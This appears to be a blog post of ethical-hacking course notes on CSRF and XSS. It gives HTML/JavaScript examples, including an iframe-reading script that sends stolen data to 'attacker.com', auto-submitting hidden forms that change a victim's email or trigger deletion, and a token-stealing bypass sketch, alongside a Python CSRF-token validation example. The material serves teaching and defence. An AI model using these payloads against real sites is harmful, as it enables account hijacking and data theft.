Sunday, July 6, 2025

Segfault ethical hacking week 12

Understanding CSRF (Cross-Site Request Forgery): A Deep Dive

CSRF (Cross-Site Request Forgery) is one of the most common and dangerous web vulnerabilities. It exploits the trust that a web application has in a user’s browser session to perform unauthorized actions on behalf of the user.

Server-side attack:

  • SQL Injection: Manipulating server queries by injecting malicious SQL statements.

Client-side attacks:

  • XSS (Cross-Site Scripting): Injecting malicious scripts into web pages viewed by other users.

  • CSRF (Cross-Site Request Forgery): Forcing a victim’s browser to send unintended requests to a trusted site.



Script that retrieves data from another page

Example:

<iframe id="myFrame" src="mypage.php"></iframe>
<script>
  var myFrame = document.getElementById('myFrame');
  // Reading contentDocument succeeds only when the framed page is same-origin;
  // the Same-Origin Policy blocks it for a page from another site.
  var data = myFrame.contentDocument.getElementById('targetElement').innerText;
  var i = new Image();
  // The image request carries the extracted data to the attacker's server.
  i.src = "https://attacker.com/?" + data;
</script>
  • This script loads a page into an iframe and extracts specific data.

  • The stolen data is sent to the attacker via a GET request.



CSRF (Cross-Site Request Forgery)

  • An attack that tricks the victim into making unwanted requests to the server.

  • Example: When the victim is authenticated, the attacker forces a request that changes account settings.

Difference:

  • CSRF: Victim’s browser is exploited to send requests.

  • XSS: Malicious scripts are injected to run in the victim’s browser.



Combining CSRF and XSS

  • XSS can be used to automatically trigger CSRF, without requiring the victim to click.

  • Where does CSRF happen?

    • Any request can be exploited.

    • GET requests are particularly dangerous because clicking a link is enough.

    • Using POST instead of GET does not solve CSRF if no validation is implemented.

Example:

<h1>Click This!!!</h1>
<form method="POST" action="https://victim.com/update">
  <input type="hidden" name="email" value="attacker@example.com" />
  <input type="submit" value="Submit" />
</form>
  • When the victim clicks, a forged request updates data.



Iframe-based attacks

Hidden iframe:


<iframe width="0" height="0" border="0" name="stealthFrame"></iframe>

Using JavaScript to auto-submit a form:


<script> document.getElementById("myForm").submit(); </script>
  • The victim unknowingly sends the request.



Automated XSS scenario

Example:

<h1>Hello</h1>
<form method="POST" action="https://victim.com/change" id="myForm">
  <input type="hidden" name="email" value="attacker@evil.com" />
</form>
<script>
  document.getElementById("myForm").submit();
</script>
  • Visiting the page triggers the request automatically.



Combining iframe + form submission

Example:

<iframe name="stealthFrame"></iframe>
<form method="POST" action="https://victim.com/delete" id="myForm" target="stealthFrame">
  <input type="hidden" name="confirm" value="yes" />
</form>
<script>
  document.getElementById("myForm").submit();
</script>
  • The request is sent invisibly in the background.



CSRF Token

  • A unique token generated by the server for each user session.

  • Must be included in forms:


<form>
  <input type="hidden" name="csrfToken" value="unique_token_value" />
</form>
  • The server verifies that the submitted token matches.

  • If the token is missing or invalid, the request is rejected.



CSRF token characteristics:

  • Unknown to the attacker.

  • Changes with every request.

  • Prevents attacks even when using iframes.
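The server side of the token check described above, as an added example that is not part of the original post: a constructed in-memory session store stands in for a real session backend, and the request handler, session id and field name `csrfToken` are assumptions chosen to match the form shown earlier.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data.
# In a real application this is the server's session backend.
SESSIONS = {"sess-abc123": {"user": "alice", "csrf_token": None}}


def issue_csrf_token(session_id):
    """Generate an unpredictable token and bind it to the session.

    The server renders it into the form as the hidden csrfToken field; a page
    on another origin cannot read it because of the Same-Origin Policy.
    """
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id]["csrf_token"] = token
    return token


def validate_csrf_token(session_id, submitted):
    """Return True only if the submitted token matches the session's token.

    Missing, non-string, unknown or mismatched tokens fail. The token is
    single-use: it is cleared on every check, so each request needs a new one.
    """
    session = SESSIONS.get(session_id)
    if session is None or not isinstance(submitted, str) or not submitted:
        return False
    expected = session.get("csrf_token")
    if not expected:
        return False
    # Constant-time comparison avoids leaking token bytes through timing.
    ok = hmac.compare_digest(expected.encode(), submitted.encode())
    session["csrf_token"] = None  # rotate: consumed whether or not it matched
    return ok


def handle_update(session_id, form):
    """Simulated POST /update handler: reject any request with a bad token."""
    if not validate_csrf_token(session_id, form.get("csrfToken")):
        return "403 Forbidden: CSRF token missing or invalid"
    user = SESSIONS[session_id]["user"]
    return "200 OK: email for %s set to %s" % (user, form["email"])


if __name__ == "__main__":
    sid = "sess-abc123"
    token = issue_csrf_token(sid)  # server puts this into the rendered form
    print(handle_update(sid, {"email": "new@example.com", "csrfToken": token}))
    # A forged cross-site form (like "Click This!!!") carries no token.
    print(handle_update(sid, {"email": "attacker@example.com"}))
    # Replaying the already-consumed token fails as well.
    print(handle_update(sid, {"email": "x@example.com", "csrfToken": token}))
```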



Bypassing CSRF using iframe and JavaScript

  • Attackers may try to load a victim’s page in an iframe:


<iframe src="mypage"></iframe>
  • Use JavaScript to read the CSRF token:


var token = iframe.contentDocument.getElementById("csrfToken").value;
  • Then create a malicious form and submit it with the stolen token.

  • This method can bypass CSRF protection only if the site allows cross-origin access to the framed page, which is why the Same-Origin Policy must be enforced.
